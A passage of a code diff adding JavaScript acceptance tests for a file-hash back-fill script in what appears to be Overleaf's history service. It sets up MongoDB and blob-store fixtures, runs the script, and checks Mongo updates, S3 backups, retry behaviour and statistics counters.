+  const projectIdNoHistory = objectIdFromTime('2017-01-01T00:06:00Z')
+  const projectIdNoHistoryDeleted = objectIdFromTime('2017-01-01T00:07:00Z')
+  const projectIdHardDeleted = objectIdFromTime('2017-01-01T00:08:00Z')
+  const projectIdNoOverleaf = objectIdFromTime('2017-01-01T00:09:00Z')
+  const projectIdNoOverleafDeleted = objectIdFromTime('2017-01-01T00:10:00Z')
+  const projectIdBadFileTree0 = objectIdFromTime('2024-01-01T00:11:00Z')
+  const projectIdBadFileTree1 = objectIdFromTime('2024-01-01T00:12:00Z')
+  const projectIdBadFileTree2 = objectIdFromTime('2024-01-01T00:13:00Z')
+  const projectIdBadFileTree3 = objectIdFromTime('2024-01-01T00:14:00Z')
+  const historyId0 = 42 // stored as a number in mongo
+  const historyId1 = projectId1.toString()
+  const historyId2 = projectId2.toString()
+  const historyId3 = projectId3.toString()
+  const historyIdDeleted0 = projectIdDeleted0.toString()
+  const historyIdDeleted1 = projectIdDeleted1.toString()
+  const historyIdBadFileTree0 = projectIdBadFileTree0.toString()
+  const historyIdBadFileTree1 = projectIdBadFileTree1.toString()
+  const historyIdBadFileTree2 = projectIdBadFileTree2.toString()
+  const historyIdBadFileTree3 = projectIdBadFileTree3.toString()
+  const fileId0 = objectIdFromTime('2017-02-01T00:00:00Z')
+  const fileId1 = objectIdFromTime('2017-02-01T00:01:00Z')
+  const fileId2 = objectIdFromTime('2017-02-01T00:02:00Z')
+  const fileId3 = objectIdFromTime('2017-02-01T00:03:00Z')
+  const fileId4 = objectIdFromTime('2017-02-01T00:04:00Z')
+  const fileId5 = objectIdFromTime('2024-02-01T00:05:00Z')
+  const fileId6 = objectIdFromTime('2017-02-01T00:06:00Z')
+  const fileId7 = objectIdFromTime('2017-02-01T00:07:00Z')
+  const fileId8 = objectIdFromTime('2017-02-01T00:08:00Z')
+  const fileId9 = objectIdFromTime('2017-02-01T00:09:00Z')
+  const fileIdDeleted1 = objectIdFromTime('2017-03-01T00:01:00Z')
+  const fileIdDeleted2 = objectIdFromTime('2017-03-01T00:02:00Z')
+  const fileIdDeleted3 = objectIdFromTime('2017-03-01T00:03:00Z')
+  const fileIdDeleted4 = objectIdFromTime('2024-03-01T00:04:00Z')
+  const fileIdDeleted5 = objectIdFromTime('2024-03-01T00:05:00Z')
+  const contentTextBlob0 = Buffer.from('Hello 0')
+  const hashTextBlob0 = gitBlobHashBuffer(contentTextBlob0)
+  const contentTextBlob1 = Buffer.from('Hello 1')
+  const hashTextBlob1 = gitBlobHashBuffer(contentTextBlob1)
+  const contentTextBlob2 = Buffer.from('Hello 2')
+  const hashTextBlob2 = gitBlobHashBuffer(contentTextBlob2)
+  const contentTextBlob3 = Buffer.from('Hello 3')
+  const hashTextBlob3 = gitBlobHashBuffer(contentTextBlob3)
+  const deleteProjectsRecordId0 = new ObjectId()
+  const deleteProjectsRecordId1 = new ObjectId()
+  const deleteProjectsRecordId2 = new ObjectId()
+  const deleteProjectsRecordId3 = new ObjectId()
+  const deleteProjectsRecordId4 = new ObjectId()
+  const twoByteUTF8Symbol = 'ö'
+  const contentFile7 = Buffer.alloc(4_000_000, twoByteUTF8Symbol)
+  const hashFile7 = gitBlobHashBuffer(contentFile7)
+  const potentiallyWrittenBlobs = [
+    { projectId: projectId0, historyId: historyId0, fileId: fileId0 },
+    // { historyId: projectId0, fileId: fileId6 }, // global blob
+    {
+      projectId: projectId0,
+      historyId: historyId0,
+      fileId: fileId7,
+      hash: hashFile7,
+      content: contentFile7,
+    },
+    { projectId: projectId0, historyId: historyId0, fileId: fileIdDeleted5 },
+    {
+      projectId: projectId0,
+      historyId: historyId0,
+      hash: hashTextBlob0,
+      content: contentTextBlob0,
+    },
+    {
+      projectId: projectId1,
+      historyId: historyId1,
+      hash:
hashTextBlob1, + content: contentTextBlob1, + }, + { + projectId: projectId2, + historyId: historyId2, + hash: hashTextBlob2, + content: contentTextBlob2, + }, + { projectId: projectId1, historyId: historyId1, fileId: fileId1 }, + { projectId: projectId1, historyId: historyId1, fileId: fileIdDeleted1 }, + { + projectId: projectId2, + historyId: historyId2, + fileId: fileId2, + hasHash: true, + }, + { projectId: projectId3, historyId: historyId3, fileId: fileId3 }, + { + projectId: projectIdDeleted0, + historyId: historyIdDeleted0, + fileId: fileId4, + }, + { + projectId: projectIdDeleted0, + historyId: historyIdDeleted0, + fileId: fileIdDeleted2, + }, + // { historyId: historyIdDeleted0, fileId:fileIdDeleted3 }, // fileIdDeleted3 is dupe of fileIdDeleted2 + { + projectId: projectIdDeleted0, + historyId: historyIdDeleted0, + fileId: fileIdDeleted4, + hasHash: true, + }, + { + projectId: projectIdDeleted1, + historyId: historyIdDeleted1, + fileId: fileId5, + hasHash: true, + }, + { + projectId: projectIdBadFileTree0, + historyId: historyIdBadFileTree0, + hash: hashTextBlob3, + content: contentTextBlob3, + }, + { + projectId: projectIdBadFileTree3, + historyId: historyIdBadFileTree3, + fileId: fileId9, + }, + ] + if (PRINT_IDS_AND_HASHES_FOR_DEBUGGING) { + const fileIds = { + fileId0, + fileId1, + fileId2, + fileId3, + fileId4, + fileId5, + fileId6, + fileIdDeleted1, + fileIdDeleted2, + fileIdDeleted3, + fileIdDeleted4, + } + console.log({ + projectId0, + projectId1, + projectId2, + projectId3, + projectIdDeleted0, + projectIdDeleted1, + historyId0, + historyId1, + historyId2, + historyId3, + historyIdDeleted0, + historyIdDeleted1, + ...fileIds, + }) + for (const [name, v] of Object.entries(fileIds)) { + console.log( + name, + gitBlobHash(v), + Array.from(binaryForGitBlobHash(gitBlobHash(v)).value()) + ) + } + } + + async function populateMongo() { + await globalBlobs.insertMany([ + { _id: gitBlobHash(fileId6), byteLength: 24, stringLength: 24 }, + { _id: gitBlobHash(fileId8), byteLength: 24, stringLength: 24 }, + ]) + await projectsCollection.insertMany([ + { + _id: projectId0, + rootFolder: [ + { + fileRefs: [ + { _id: fileId8, hash: gitBlobHash(fileId8) }, + { _id: fileId0 }, + { _id: fileId6 }, + { _id: fileId7 }, + ], + folders: [{ fileRefs: [], folders: [] }], + }, + ], + overleaf: { history: { id: historyId0 } }, + }, + { + _id: projectId1, + rootFolder: [ + { + fileRefs: [{ _id: fileId1 }], + folders: [ + { + fileRefs: [], + folders: [{ fileRefs: [{ _id: fileId1 }], folders: [] }], + }, + ], + }, + ], + overleaf: { history: { id: historyId1 } }, + }, + { + _id: projectId2, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [{ _id: fileId2, hash: gitBlobHash(fileId2) }], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyId2 } }, + }, + { + _id: projectId3, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [{ _id: fileId3 }], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyId3 } }, + }, + { + _id: projectIdNoHistory, + rootFolder: [{ fileRefs: [], folders: [] }], + overleaf: { history: { conversionFailed: true } }, + }, + { + _id: projectIdNoOverleaf, + rootFolder: [{ fileRefs: [], folders: [] }], + }, + { + _id: projectIdBadFileTree0, + overleaf: { history: { id: historyIdBadFileTree0 } }, + }, + { + _id: projectIdBadFileTree1, + rootFolder: [], + overleaf: { history: { id: historyIdBadFileTree1 } }, + }, + { + _id: 
projectIdBadFileTree2, + rootFolder: [{ fileRefs: [{ _id: null }] }], + overleaf: { history: { id: historyIdBadFileTree2 } }, + }, + { + _id: projectIdBadFileTree3, + rootFolder: [ + { + folders: [null, { folders: {}, fileRefs: 13 }], + fileRefs: [{ _id: fileId9 }], + }, + ], + overleaf: { history: { id: historyIdBadFileTree3 } }, + }, + ]) + await deletedProjectsCollection.insertMany([ + { + _id: deleteProjectsRecordId0, + project: { + _id: projectIdDeleted0, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [{ fileRefs: [{ _id: fileId4 }], folders: [] }], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted0 } }, + }, + deleterData: { + deletedProjectId: projectIdDeleted0, + }, + }, + { + _id: deleteProjectsRecordId1, + project: { + _id: projectIdDeleted1, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [{ _id: fileId5, hash: gitBlobHash(fileId5) }], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted1 } }, + }, + deleterData: { + deletedProjectId: projectIdDeleted1, + }, + }, + { + _id: deleteProjectsRecordId2, + project: { + _id: projectIdNoHistoryDeleted, + rootFolder: [{ fileRefs: [], folders: [] }], + overleaf: { history: { conversionFailed: true } }, + }, + deleterData: { + deletedProjectId: projectIdNoHistoryDeleted, + }, + }, + { + _id: deleteProjectsRecordId3, + deleterData: { deletedProjectId: projectIdHardDeleted }, + }, + { + _id: deleteProjectsRecordId4, + project: { + _id: projectIdNoOverleafDeleted, + rootFolder: [{ fileRefs: [], folders: [] }], + }, + deleterData: { + deletedProjectId: projectIdNoOverleafDeleted, + }, + }, + ]) + await deletedFilesCollection.insertMany([ + { _id: fileIdDeleted1, projectId: projectId1 }, + { _id: fileIdDeleted2, projectId: projectIdDeleted0 }, + { _id: fileIdDeleted3, projectId: projectIdDeleted0 }, + { + _id: fileIdDeleted4, + projectId: projectIdDeleted0, + hash: gitBlobHash(fileIdDeleted4), + }, + { _id: fileIdDeleted5, projectId: projectId0 }, + ]) + } + + async function populateHistoryV1() { + await Promise.all([ + testProjects.createEmptyProject(historyId0.toString()), + testProjects.createEmptyProject(historyId1), + testProjects.createEmptyProject(historyId2), + testProjects.createEmptyProject(historyId3), + testProjects.createEmptyProject(historyIdDeleted0), + testProjects.createEmptyProject(historyIdDeleted1), + testProjects.createEmptyProject(historyIdBadFileTree0), + testProjects.createEmptyProject(historyIdBadFileTree1), + testProjects.createEmptyProject(historyIdBadFileTree2), + testProjects.createEmptyProject(historyIdBadFileTree3), + ]) + + const blobStore0 = new BlobStore(historyId0.toString()) + await blobStore0.putString(contentTextBlob0.toString()) + const blobStore1 = new BlobStore(historyId1.toString()) + await blobStore1.putString(contentTextBlob1.toString()) + const blobStore2 = new BlobStore(historyId2.toString()) + await blobStore2.putString(contentTextBlob2.toString()) + const blobStoreBadFileTree = new BlobStore(historyIdBadFileTree0.toString()) + await blobStoreBadFileTree.putString(contentTextBlob3.toString()) + } + + async function populateFilestore() { + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId0}`, + Stream.Readable.from([fileId0.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId6}`, + Stream.Readable.from([fileId6.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + 
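+      // contentFile7 is the 4 MB buffer of 'ö' defined above; unlike the
+      // other fixtures, whose body is just the file id string, it exercises
+      // the large, multi-byte-content upload path.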
USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId7}`, + Stream.Readable.from([contentFile7]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileIdDeleted5}`, + Stream.Readable.from([fileIdDeleted5.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId1}/${fileId1}`, + Stream.Readable.from([fileId1.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId2}/${fileId2}`, + Stream.Readable.from([fileId2.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId3}/${fileId3}`, + Stream.Readable.from([fileId3.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdDeleted0}/${fileId4}`, + Stream.Readable.from([fileId4.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdDeleted1}/${fileId5}`, + Stream.Readable.from([fileId5.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId1}/${fileIdDeleted1}`, + Stream.Readable.from([fileIdDeleted1.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdDeleted0}/${fileIdDeleted2}`, + Stream.Readable.from([fileIdDeleted2.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdDeleted0}/${fileIdDeleted3}`, + // same content as 2, deduplicate + Stream.Readable.from([fileIdDeleted2.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdDeleted0}/${fileIdDeleted4}`, + Stream.Readable.from([fileIdDeleted4.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdBadFileTree3}/${fileId9}`, + Stream.Readable.from([fileId9.toString()]) + ) + } + + async function prepareEnvironment() { + await cleanup.everything() + await populateMongo() + await populateHistoryV1() + await populateFilestore() + } + + /** + * @param {Array<string>} args + * @param {Record<string, string>} env + * @param {boolean} shouldHaveWritten + * @return {Promise<{result, stats: any}>} + */ + async function tryRunScript(args = [], env = {}, shouldHaveWritten) { + let result + try { + result = await promisify(execFile)( + process.argv0, + [ + 'storage/scripts/back_fill_file_hash.mjs', + '--processNonDeletedProjects=true', + '--processDeletedProjects=true', + '--processDeletedFiles=true', + ...args, + ], + { + encoding: 'utf-8', + timeout: TIMEOUT - 500, + env: { + ...process.env, + USER_FILES_BUCKET_NAME, + SLEEP_BEFORE_EXIT: '1', + ...env, + LOG_LEVEL: 'warn', // Override LOG_LEVEL of acceptance tests + }, + } + ) + result.status = 0 + } catch (err) { + const { stdout, stderr, code } = err + if (typeof code !== 'number') { + console.log(err) + } + result = { stdout, stderr, status: code } + } + expect((await fs.promises.readdir('/tmp')).join(';')).to.not.match( + /back_fill_file_hash/ + ) + const extraStatsKeys = [ + 'eventLoop', + 'readFromGCSThroughputMiBPerSecond', + 'writeToAWSThroughputMiBPerSecond', + ] + const stats = JSON.parse( + result.stderr + .split('\n') + .filter(l => l.includes('LOGGING_IDENTIFIER')) + .pop() + ) + expect(Object.keys(stats.diff).sort()).to.deep.equal( + [...extraStatsKeys, ...Object.keys(STATS_ALL)].sort() + ) + delete stats.diff + expect(new Date(stats.time).toISOString()).to.equal(stats.time) + delete stats.time + if (shouldHaveWritten) { + expect(stats.readFromGCSThroughputMiBPerSecond).to.be.greaterThan(0) + 
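+      // (the throughput gauges only move when bytes were actually copied,
+      // so a no-op re-run legitimately reports zero for both)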
expect(stats.writeToAWSThroughputMiBPerSecond).to.be.greaterThan(0) + } + for (const key of extraStatsKeys) { + delete stats[key] + } + delete stats.LOGGING_IDENTIFIER + expect(stats.deferredBatches).to.have.length( + 0, + 'should not have any remaining deferred batches' + ) + delete stats.deferredBatches + return { stats, result } + } + + /** + * @param {Array<string>} args + * @param {Record<string, string>} env + * @param {boolean} shouldHaveWritten + * @return {Promise<{result, stats: any}>} + */ + async function runScript(args = [], env = {}, shouldHaveWritten = true) { + const { stats, result } = await tryRunScript(args, env, shouldHaveWritten) + if (result.status !== 0) { + console.log(result) + expect(result).to.have.property('status', 0) + } + return { stats, result } + } + + /** + * @param {boolean} processHashedFiles + */ + function commonAssertions(processHashedFiles = false) { + const writtenBlobs = potentiallyWrittenBlobs.filter(({ hasHash }) => { + if (processHashedFiles) return true // all files processed + return !hasHash // only files without hash processed + }) + it('should update mongo', async function () { + expect(await projectsCollection.find({}).toArray()) + .excludingEvery([ + 'currentEndTimestamp', + 'currentEndVersion', + 'updatedAt', + 'backup', + ]) + .to.deep.equal([ + { + _id: projectId0, + rootFolder: [ + { + fileRefs: [ + { _id: fileId8, hash: gitBlobHash(fileId8) }, + { _id: fileId0, hash: gitBlobHash(fileId0) }, + { _id: fileId6, hash: gitBlobHash(fileId6) }, + { _id: fileId7, hash: hashFile7 }, + ], + folders: [{ fileRefs: [], folders: [] }], + }, + ], + overleaf: { history: { id: historyId0 } }, + }, + { + _id: projectId1, + rootFolder: [ + { + fileRefs: [{ _id: fileId1, hash: gitBlobHash(fileId1) }], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [ + { _id: fileId1, hash: gitBlobHash(fileId1) }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyId1 } }, + }, + { + _id: projectId2, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [ + { _id: fileId2, hash: gitBlobHash(fileId2) }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyId2 } }, + }, + { + _id: projectId3, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [ + { _id: fileId3, hash: gitBlobHash(fileId3) }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyId3 } }, + }, + { + _id: projectIdNoHistory, + rootFolder: [{ fileRefs: [], folders: [] }], + overleaf: { history: { conversionFailed: true } }, + }, + { + _id: projectIdNoOverleaf, + rootFolder: [{ fileRefs: [], folders: [] }], + }, + { + _id: projectIdBadFileTree0, + overleaf: { history: { id: historyIdBadFileTree0 } }, + }, + { + _id: projectIdBadFileTree1, + rootFolder: [], + overleaf: { history: { id: historyIdBadFileTree1 } }, + }, + { + _id: projectIdBadFileTree2, + rootFolder: [{ fileRefs: [{ _id: null }] }], + overleaf: { history: { id: historyIdBadFileTree2 } }, + }, + { + _id: projectIdBadFileTree3, + rootFolder: [ + { + folders: [null, { folders: {}, fileRefs: 13 }], + fileRefs: [{ _id: fileId9, hash: gitBlobHash(fileId9) }], + }, + ], + overleaf: { history: { id: historyIdBadFileTree3 } }, + }, + ]) + expect(await deletedProjectsCollection.find({}).toArray()).to.deep.equal([ + { + _id: deleteProjectsRecordId0, + project: { + _id: projectIdDeleted0, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + 
folders: [ + { + fileRefs: [ + { _id: fileId4, hash: gitBlobHash(fileId4) }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted0 } }, + }, + deleterData: { + deletedProjectId: projectIdDeleted0, + }, + }, + { + _id: deleteProjectsRecordId1, + project: { + _id: projectIdDeleted1, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [ + { _id: fileId5, hash: gitBlobHash(fileId5) }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted1 } }, + }, + deleterData: { + deletedProjectId: projectIdDeleted1, + }, + }, + { + _id: deleteProjectsRecordId2, + project: { + _id: projectIdNoHistoryDeleted, + rootFolder: [{ fileRefs: [], folders: [] }], + overleaf: { history: { conversionFailed: true } }, + }, + deleterData: { + deletedProjectId: projectIdNoHistoryDeleted, + }, + }, + { + _id: deleteProjectsRecordId3, + deleterData: { deletedProjectId: projectIdHardDeleted }, + }, + { + _id: deleteProjectsRecordId4, + project: { + _id: projectIdNoOverleafDeleted, + rootFolder: [{ fileRefs: [], folders: [] }], + }, + deleterData: { + deletedProjectId: projectIdNoOverleafDeleted, + }, + }, + ]) + expect(await deletedFilesCollection.find({}).toArray()).to.deep.equal([ + { + _id: fileIdDeleted1, + projectId: projectId1, + hash: gitBlobHash(fileIdDeleted1), + }, + { + _id: fileIdDeleted2, + projectId: projectIdDeleted0, + hash: gitBlobHash(fileIdDeleted2), + }, + { + _id: fileIdDeleted3, + projectId: projectIdDeleted0, + // uses the same content as fileIdDeleted2 + hash: gitBlobHash(fileIdDeleted2), + }, + { + _id: fileIdDeleted4, + projectId: projectIdDeleted0, + hash: gitBlobHash(fileIdDeleted4), + }, + { + _id: fileIdDeleted5, + projectId: projectId0, + hash: gitBlobHash(fileIdDeleted5), + }, + ]) + expect( + (await backedUpBlobs.find({}, { sort: { _id: 1 } }).toArray()).map( + entry => { + // blobs are pushed unordered into mongo. Sort the list for consistency. + entry.blobs.sort() + return entry + } + ) + ).to.deep.equal([ + { + _id: projectId0, + blobs: [ + binaryForGitBlobHash(gitBlobHash(fileId0)), + binaryForGitBlobHash(hashFile7), + binaryForGitBlobHash(gitBlobHash(fileIdDeleted5)), + binaryForGitBlobHash(hashTextBlob0), + ].sort(), + }, + { + _id: projectId1, + blobs: [ + binaryForGitBlobHash(gitBlobHash(fileId1)), + binaryForGitBlobHash(gitBlobHash(fileIdDeleted1)), + binaryForGitBlobHash(hashTextBlob1), + ].sort(), + }, + { + _id: projectId2, + blobs: [binaryForGitBlobHash(hashTextBlob2)] + .concat( + processHashedFiles + ? [binaryForGitBlobHash(gitBlobHash(fileId2))] + : [] + ) + .sort(), + }, + { + _id: projectIdDeleted0, + blobs: [ + binaryForGitBlobHash(gitBlobHash(fileId4)), + binaryForGitBlobHash(gitBlobHash(fileIdDeleted2)), + ] + .concat( + processHashedFiles + ? [binaryForGitBlobHash(gitBlobHash(fileIdDeleted4))] + : [] + ) + .sort(), + }, + { + _id: projectId3, + blobs: [binaryForGitBlobHash(gitBlobHash(fileId3))].sort(), + }, + ...(processHashedFiles + ? 
[ + { + _id: projectIdDeleted1, + blobs: [binaryForGitBlobHash(gitBlobHash(fileId5))].sort(), + }, + ] + : []), + { + _id: projectIdBadFileTree0, + blobs: [binaryForGitBlobHash(hashTextBlob3)].sort(), + }, + { + _id: projectIdBadFileTree3, + blobs: [binaryForGitBlobHash(gitBlobHash(fileId9))].sort(), + }, + ]) + }) + it('should have backed up all the files', async function () { + expect(tieringStorageClass).to.exist + const blobs = await listS3Bucket(projectBlobsBucket, tieringStorageClass) + expect(blobs.sort()).to.deep.equal( + writtenBlobs + .map(({ historyId, fileId, hash }) => + makeProjectKey(historyId, hash || gitBlobHash(fileId)) + ) + .sort() + ) + for (let { historyId, fileId, hash, content } of writtenBlobs) { + hash = hash || gitBlobHash(fileId.toString()) + const s = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, hash), + { autoGunzip: true } + ) + const buf = new WritableBuffer() + await Stream.promises.pipeline(s, buf) + expect(gitBlobHashBuffer(buf.getContents())).to.equal(hash) + if (content) { + expect(buf.getContents()).to.deep.equal(content) + } else { + const id = buf.getContents().toString('utf-8') + expect(id).to.equal(fileId.toString()) + // double check we are not comparing 'undefined' or '[object Object]' above + expect(id).to.match(/^[a-f0-9]{24}$/) + } + } + const deks = await listS3Bucket(deksBucket, 'STANDARD') + expect(deks.sort()).to.deep.equal( + Array.from( + new Set( + writtenBlobs.map( + ({ historyId }) => projectKey.format(historyId) + '/dek' + ) + ) + ).sort() + ) + }) + it('should have written the back filled files to history v1', async function () { + for (const { historyId, hash, fileId, content } of writtenBlobs) { + const blobStore = new BlobStore(historyId.toString()) + if (content) { + const s = await blobStore.getStream(hash) + const buf = new WritableBuffer() + await Stream.promises.pipeline(s, buf) + expect(buf.getContents()).to.deep.equal(content) + continue + } + const id = await blobStore.getString( + hash || gitBlobHash(fileId.toString()) + ) + expect(id).to.equal(fileId.toString()) + // double check we are not comparing 'undefined' or '[object Object]' above + expect(id).to.match(/^[a-f0-9]{24}$/) + } + }) + // Technically, we should move the below test into its own environment to ensure it does not impact any assertions. + // Practically, this is slow and moving it to the end of the tests gets us there most of the way. + it('should process nothing on re-run', async function () { + const rerun = await runScript( + processHashedFiles ? ['--processHashedFiles=true'] : [], + {}, + false + ) + let stats = { + ...STATS_ALL_ZERO, + // We still need to iterate over all the projects and blobs. 
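+        // Only the scan counters below are non-zero; every write/egress
+        // counter keeps its STATS_ALL_ZERO value.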
+ projects: 10, + blobs: 13, + backedUpBlobs: 13, + badFileTrees: 4, + } + if (processHashedFiles) { + stats = sumStats(stats, { + ...STATS_ALL_ZERO, + blobs: 3, + backedUpBlobs: 3, + }) + } + expect(rerun.stats).deep.equal(stats) + }) + } + + function expectNotFoundError(result, msg) { + expect(result.stdout).to.include(msg) + const log = JSON.parse( + result.stdout.split('\n').find(l => l.includes(`"${msg}"`)) + ) + expect(log).to.contain({ + projectId: projectId0.toString(), + fileId: fileId0.toString(), + path: 'rootFolder.0.fileRefs.1', + msg, + }) + expect(log.err).to.contain({ + name: 'NotFoundError', + }) + } + + const STATS_ALL_ZERO = { + projects: 0, + blobs: 0, + backedUpBlobs: 0, + filesWithHash: 0, + filesWithoutHash: 0, + filesDuplicated: 0, + filesRetries: 0, + filesFailed: 0, + globalBlobsCount: 0, + globalBlobsEgress: 0, + fileTreeUpdated: 0, + projectDeleted: 0, + projectHardDeleted: 0, + fileHardDeleted: 0, + badFileTrees: 0, + mongoUpdates: 0, + deduplicatedWriteToAWSLocalCount: 0, + deduplicatedWriteToAWSLocalEgress: 0, + deduplicatedWriteToAWSRemoteCount: 0, + deduplicatedWriteToAWSRemoteEgress: 0, + readFromGCSCount: 0, + readFromGCSIngress: 0, + writeToAWSCount: 0, + writeToAWSEgress: 0, + writeToGCSCount: 0, + writeToGCSEgress: 0, + } + const STATS_UP_TO_PROJECT1 = { + projects: 2, + blobs: 2, + backedUpBlobs: 0, + filesWithHash: 0, + filesWithoutHash: 7, + filesDuplicated: 1, + filesRetries: 0, + filesFailed: 0, + globalBlobsCount: 1, + globalBlobsEgress: 30, + fileTreeUpdated: 0, + projectDeleted: 0, + projectHardDeleted: 0, + fileHardDeleted: 0, + badFileTrees: 0, + mongoUpdates: 6, + deduplicatedWriteToAWSLocalCount: 0, + deduplicatedWriteToAWSLocalEgress: 0, + deduplicatedWriteToAWSRemoteCount: 0, + deduplicatedWriteToAWSRemoteEgress: 0, + readFromGCSCount: 8, + readFromGCSIngress: 4000134, + writeToAWSCount: 7, + writeToAWSEgress: 4086, + writeToGCSCount: 5, + writeToGCSEgress: 4000096, + } + const STATS_UP_FROM_PROJECT1_ONWARD = { + projects: 8, + blobs: 2, + backedUpBlobs: 0, + filesWithHash: 0, + filesWithoutHash: 5, + filesDuplicated: 0, + filesRetries: 0, + filesFailed: 0, + globalBlobsCount: 0, + globalBlobsEgress: 0, + fileTreeUpdated: 0, + projectDeleted: 0, + projectHardDeleted: 0, + fileHardDeleted: 0, + badFileTrees: 4, + mongoUpdates: 10, + deduplicatedWriteToAWSLocalCount: 1, + deduplicatedWriteToAWSLocalEgress: 30, + deduplicatedWriteToAWSRemoteCount: 0, + deduplicatedWriteToAWSRemoteEgress: 0, + readFromGCSCount: 7, + readFromGCSIngress: 134, + writeToAWSCount: 6, + writeToAWSEgress: 173, + writeToGCSCount: 4, + writeToGCSEgress: 96, + } + const STATS_FILES_HASHED_EXTRA = { + ...STATS_ALL_ZERO, + filesWithHash: 3, + mongoUpdates: 1, + readFromGCSCount: 3, + readFromGCSIngress: 72, + writeToAWSCount: 3, + writeToAWSEgress: 89, + writeToGCSCount: 3, + writeToGCSEgress: 72, + } + + function sumStats(a, b) { + return Object.fromEntries(Object.entries(a).map(([k, v]) => [k, v + b[k]])) + } + + const STATS_ALL = sumStats( + STATS_UP_TO_PROJECT1, + STATS_UP_FROM_PROJECT1_ONWARD + ) + + describe('error cases', () => { + beforeEach('prepare environment', prepareEnvironment) + + it('should gracefully handle fatal errors', async function () { + await FILESTORE_PERSISTOR.deleteObject( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId0}` + ) + const t0 = Date.now() + const { stats, result } = await tryRunScript([], { + RETRIES: '10', + RETRY_DELAY_MS: '1000', + }) + const t1 = Date.now() + expectNotFoundError(result, 'failed to process file') + 
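+      // The 404 is fatal: the script exits non-zero and the partial work for
+      // the failed file is backed out again, hence the negative deltas in
+      // the expected stats below.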
expect(result.status).to.equal(1) + expect(stats).to.deep.equal( + sumStats(STATS_ALL, { + ...STATS_ALL_ZERO, + filesFailed: 1, + readFromGCSIngress: -24, + writeToAWSCount: -1, + writeToAWSEgress: -28, + writeToGCSCount: -1, + writeToGCSEgress: -24, + }) + ) + // should not retry 404 + expect(result.stdout).to.not.include( + 'failed to process file, trying again' + ) + expect(t1 - t0).to.be.below(10_000) + }) + + it('should retry on error', async function () { + await FILESTORE_PERSISTOR.deleteObject( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId0}` + ) + const restoreFileAfter5s = async () => { + await setTimeout(5_000) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId0}`, + Stream.Readable.from([fileId0.toString()]) + ) + } + // use Promise.allSettled to ensure the above sendStream call finishes before this test completes + const [ + { + value: { stats, result }, + }, + ] = await Promise.allSettled([ + tryRunScript([], { + RETRY_DELAY_MS: '100', + RETRIES: '60', + RETRY_FILESTORE_404: 'true', // 404s are the easiest to simulate in tests + }), + restoreFileAfter5s(), + ]) + expectNotFoundError(result, 'failed to process file, trying again') + expect(result.status).to.equal(0) + expect({ ...stats, filesRetries: 0, readFromGCSCount: 0 }).to.deep.equal({ + ...STATS_ALL, + filesRetries: 0, + readFromGCSCount: 0, + }) + expect(stats.filesRetries).to.be.greaterThan(0, 'should have retried') + expect(stats.readFromGCSCount).to.be.greaterThan( + STATS_ALL.readFromGCSCount, + 'should have read more times from GCS compared to normal operations' + ) + }) + }) + + describe('full run CONCURRENCY=1', function () { + let output + before('prepare environment', prepareEnvironment) + before('run script', async function () { + output = await runScript([], { + CONCURRENCY: '1', + }) + }) + + /** + * @param {ObjectId} projectId + * @param {string} msg + * @param {string} path + */ + function expectBadFileTreeMessage(projectId, msg, path) { + const line = output.result.stdout + .split('\n') + .find(l => l.includes(msg) && l.includes(projectId.toString())) + expect(line).to.exist + expect(JSON.parse(line)).to.include({ + projectId: projectId.toString(), + msg, + path, + }) + } + + it('should print stats', function () { + 